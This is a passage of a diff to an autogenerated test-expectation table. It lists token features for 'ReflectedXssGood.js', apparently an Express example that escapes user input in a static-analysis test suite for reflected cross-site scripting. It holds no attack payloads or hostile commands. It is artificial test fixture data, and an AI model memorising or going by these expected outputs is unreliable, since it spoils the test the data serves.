autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:23:55:25 | url | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:23:55:25 | url | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:55:23:55:25 | url | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:7 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:7 | res | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:7 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:12 | res.send | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:12 | res.send | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:12 | res.send | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:17 | exceptional return of res.send(url) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:17 | exceptional return of res.send(url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:17 | exceptional return of res.send(url) | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:17 | exceptional return of res.send(url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:17 | exceptional return of res.send(url) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:17 | res.send(url) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:17 | res.send(url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:17 | res.send(url) | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:17 | res.send(url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:5:56:17 | res.send(url) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:9:56:12 | send | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:9:56:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:9:56:12 | send | enclosingFunctionBody | req res url req params id /["'&<>]/ exec url res send url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:9:56:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:9:56:12 | send | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:14:56:16 | url | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:14:56:16 | url | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:14:56:16 | url | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21231,6 +141514,76 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:14:56:16 | url | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:14:56:16 | url | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:56:14:56:16 | url | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:60:0 | this | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:60:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:60:0 | this | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:60:0 | this | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:60:0 | this | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | 'arguments' object of function escapeHtml1 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | 'arguments' object of function escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | 'arguments' object of function escapeHtml1 | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | 'arguments' object of function escapeHtml1 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | 'arguments' object of function escapeHtml1 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | exceptional return of function escapeHtml1 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | exceptional return of function escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | exceptional return of function escapeHtml1 | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | exceptional return of function escapeHtml1 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | exceptional return of function escapeHtml1 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | functio ... ;\\n }\\n} | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | functio ... ;\\n }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | functio ... ;\\n }\\n} | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | return of function escapeHtml1 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | return of function escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | return of function escapeHtml1 | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | return of function escapeHtml1 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:1:64:1 | return of function escapeHtml1 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:10:60:20 | escapeHtml1 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:10:60:20 | escapeHtml1 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:10:60:20 | escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:10:60:20 | escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:10:60:20 | escapeHtml1 | contextSurroundingFunctionParameters | (str) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:10:60:20 | escapeHtml1 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:10:60:20 | escapeHtml1 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:23:60:25 | str | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:23:60:25 | str | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:23:60:25 | str | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:23:60:25 | str | contextSurroundingFunctionParameters | (str) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:23:60:25 | str | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:23:60:25 | str | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:23:60:25 | str | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:23:60:25 | str | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:23:60:25 | str | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:60:23:60:25 | str | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:7:61:26 | !/["'&<>]/.exec(str) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:7:61:26 | !/["'&<>]/.exec(str) | contextSurroundingFunctionParameters | (str) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:7:61:26 | !/["'&<>]/.exec(str) | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:7:61:26 | !/["'&<>]/.exec(str) | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:7:61:26 | !/["'&<>]/.exec(str) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:16 | /["'&<>]/ | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:16 | /["'&<>]/ | contextSurroundingFunctionParameters | (str) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:16 | /["'&<>]/ | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:16 | /["'&<>]/ | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:16 | /["'&<>]/ | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:21 | /["'&<>]/.exec | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:21 | /["'&<>]/.exec | contextSurroundingFunctionParameters | (str) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:21 | /["'&<>]/.exec | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:21 | /["'&<>]/.exec | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:21 | /["'&<>]/.exec | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:26 | /["'&<>]/.exec(str) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:26 | /["'&<>]/.exec(str) | contextSurroundingFunctionParameters | (str) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:26 | /["'&<>]/.exec(str) | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:26 | /["'&<>]/.exec(str) | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:26 | /["'&<>]/.exec(str) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:26 | exceptional return of /["'&<>]/.exec(str) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:26 | exceptional return of /["'&<>]/.exec(str) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:26 | exceptional return of /["'&<>]/.exec(str) | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:26 | exceptional return of /["'&<>]/.exec(str) | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:8:61:26 | exceptional return of /["'&<>]/.exec(str) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:18:61:21 | exec | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:18:61:21 | exec | contextSurroundingFunctionParameters | (str) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:18:61:21 | exec | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:18:61:21 | exec | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:18:61:21 | exec | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:23:61:25 | str | CalleeFlexibleAccessPath | ?.exec | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:23:61:25 | str | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:23:61:25 | str | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21238,6 +141591,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:23:61:25 | str | enclosingFunctionBody | str /["'&<>]/ exec str str | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:23:61:25 | str | enclosingFunctionName | escapeHtml1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:61:23:61:25 | str | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:62:14:62:16 | str | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:62:14:62:16 | str | contextSurroundingFunctionParameters | (str) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:62:14:62:16 | str | enclosingFunctionBody | str /["'&<>]/ exec str str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:62:14:62:16 | str | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:62:14:62:16 | str | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:1:66:3 | app | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:1:66:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:1:66:3 | app | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:1:66:7 | app.get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:1:66:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:1:66:7 | app.get | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:1:70:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:1:70:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:1:70:2 | app.get ... / OK\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:1:70:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:1:70:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:1:70:2 | exceptional return of app.get ... / OK\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:5:66:7 | get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:5:66:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:5:66:7 | get | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:9:66:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:9:66:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:9:66:19 | '/user/:id' | calleeImports | express | @@ -21245,6 +141618,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:9:66:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:9:66:19 | '/user/:id' | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:9:66:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:66:21 | escapeHtml1 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:66:21 | escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:66:21 | escapeHtml1 | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:66:21 | escapeHtml1 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:66:21 | escapeHtml1 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:66:21 | this | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:66:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:66:21 | this | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:66:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:66:21 | this | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | 'arguments' object of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | exceptional return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | exceptional return of anonymous function | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | exceptional return of anonymous function | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | functio ... // OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | functio ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | functio ... // OK\\n} | calleeImports | express | @@ -21252,6 +141645,101 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | functio ... // OK\\n} | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | functio ... // OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | return of anonymous function | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:22:70:1 | return of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:31:66:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:31:66:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:31:66:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:31:66:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:31:66:33 | req | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:31:66:33 | req | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:31:66:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:31:66:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:31:66:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:31:66:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:36:66:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:36:66:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:36:66:38 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:36:66:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:36:66:38 | res | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:36:66:38 | res | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:36:66:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:36:66:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:36:66:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:66:36:66:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:11 | url | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:11 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:11 | url | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:11 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:11 | url | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:27 | url | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:27 | url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:27 | url | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:27 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:27 | url | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:27 | url = req.params.id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:27 | url = req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:27 | url = req.params.id | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:27 | url = req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:9:67:27 | url = req.params.id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:17 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:17 | req | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:17 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:24 | req.params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:24 | req.params | contextSurroundingFunctionParameters | (req, res) | +| 